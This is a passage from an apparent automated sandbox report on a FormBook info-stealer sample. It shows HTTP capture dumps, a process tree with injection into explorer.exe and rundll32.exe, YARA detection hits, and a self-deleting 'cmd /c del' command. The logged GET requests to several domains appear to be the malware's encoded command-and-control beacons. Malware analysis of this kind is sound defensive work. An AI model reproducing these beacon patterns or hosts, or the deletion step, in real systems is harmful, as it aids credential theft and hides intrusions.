32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px
                                                                      Jun 5, 2022 13:07:05.938288927 CEST14314INData Raw: 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74
                                                                      Data Ascii: 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:
                                                                      Jun 5, 2022 13:07:05.938325882 CEST14315INData Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 20 0a 20 20 3c 68 33 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c
                                                                      Data Ascii: container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely cause
                                                                      Jun 5, 2022 13:07:05.938364983 CEST14316INData Raw: 3b 26 6e 62 73 70 3b 53 74 61 74 69 63 46 69 6c 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 45 72 72 6f 72 20 43 6f 64 65 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 30 78 38 30
                                                                      Data Ascii: ;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Request


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.54994623.227.38.7480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:07:11.028254986 CEST14324OUTGET /ocgr/?1bEX=kkcvVq01iw48hCQBW4MaTtaHwAG6gu+AbY/89EqN09znnDW7xajgziFbmfLdfE+4DaO2&8p=qVwdVxLX0 HTTP/1.1
                                                                      Host: www.tahnforest.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:07:11.076240063 CEST14325INHTTP/1.1 403 Forbidden
                                                                      Date: Sun, 05 Jun 2022 11:07:11 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      X-Sorting-Hat-PodId: 208
                                                                      X-Sorting-Hat-ShopId: 60177744081
                                                                      X-Dc: gcp-europe-west1
                                                                      X-Request-ID: da6285ad-cfd4-42a8-9bcc-1ad102ed9cee
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Server: cloudflare
                                                                      CF-RAY: 71687171f8c99004-FRA
                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                                                                      Jun 5, 2022 13:07:11.076294899 CEST14326INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                      Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                                                                      Jun 5, 2022 13:07:11.076338053 CEST14328INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                      Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                                                                      Jun 5, 2022 13:07:11.076379061 CEST14329INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                      Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                      Jun 5, 2022 13:07:11.076415062 CEST14330INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                      Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                                                                      Jun 5, 2022 13:07:11.076447010 CEST14330INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.54994715.197.142.17380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:07:21.240432024 CEST14331OUTGET /ocgr/?1bEX=RCN0VIpNVc3o/0Xt/AQqQ/q9rwjWgBzqDKIEKCgy7ZwX9axoT0DyuUXrxj1X0+Rk7knz&8p=qVwdVxLX0 HTTP/1.1
                                                                      Host: www.american-atlantic.net
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:07:21.295186043 CEST14331INHTTP/1.1 403 Forbidden
                                                                      Server: awselb/2.0
                                                                      Date: Sun, 05 Jun 2022 11:07:21 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 118
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.54995037.187.131.15080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:07:36.511559963 CEST14345OUTGET /ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/fu7sDLzfFUskF5Y&D8=x2Ml3P6p HTTP/1.1
                                                                      Host: www.14offresimportantes.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:07:36.540524960 CEST14346INHTTP/1.1 301 Moved Permanently
                                                                      Date: Sun, 05 Jun 2022 11:07:36 GMT
                                                                      Server: Apache
                                                                      Location: https://www.14offresimportantes.com/ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/fu7sDLzfFUskF5Y&D8=x2Ml3P6p
                                                                      Content-Length: 339
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 34 6f 66 66 72 65 73 69 6d 70 6f 72 74 61 6e 74 65 73 2e 63 6f 6d 2f 6f 63 67 72 2f 3f 31 62 45 58 3d 38 5a 64 55 55 6f 34 4b 6f 2f 31 45 75 74 4f 67 46 46 68 36 41 63 78 56 44 30 35 4f 4b 4e 55 39 2f 75 31 4f 4e 6a 58 76 4b 54 78 6e 54 31 73 75 6f 69 65 41 2f 66 75 37 73 44 4c 7a 66 46 55 73 6b 46 35 59 26 61 6d 70 3b 44 38 3d 78 32 4d 6c 33 50 36 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.14offresimportantes.com/ocgr/?1bEX=8ZdUUo4Ko/1EutOgFFh6AcxVD05OKNU9/u1ONjXvKTxnT1suoieA/fu7sDLzfFUskF5Y&amp;D8=x2Ml3P6p">here</a>.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.54995134.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 5, 2022 13:07:41.611059904 CEST14347OUTGET /ocgr/?1bEX=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+g37Dk2fKSc&D8=x2Ml3P6p HTTP/1.1
                                                                      Host: www.nagpurmandarin.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 5, 2022 13:07:41.725567102 CEST14347INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Sun, 05 Jun 2022 11:07:41 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 291
                                                                      ETag: "6293d166-123"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:13:04:20
                                                                      Start date:05/06/2022
                                                                      Path:C:\Users\user\Desktop\gZU26RjMUU.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\gZU26RjMUU.exe"
                                                                      Imagebase:0x810000
                                                                      File size:325144 bytes
                                                                      MD5 hash:5DAED332426C66A3852518126BC49DFE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.435543946.0000000003F58000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Target ID:3
                                                                      Start time:13:04:24
                                                                      Start date:05/06/2022
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                      Imagebase:0xa20000
                                                                      File size:43176 bytes
                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.429802267.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.505733609.0000000005040000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.430334848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.506547832.00000000058B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Target ID:4
                                                                      Start time:13:04:27
                                                                      Start date:05/06/2022
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff74fc70000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.472043907.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.488247292.000000000F0F5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:11
                                                                      Start time:13:04:57
                                                                      Start date:05/06/2022
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                      Imagebase:0xce0000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.948040587.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.948401509.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.948422900.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:13
                                                                      Start time:13:05:03
                                                                      Start date:05/06/2022
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                                                      Imagebase:0x1100000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:14
                                                                      Start time:13:05:03
                                                                      Start date:05/06/2022
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff77f440000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
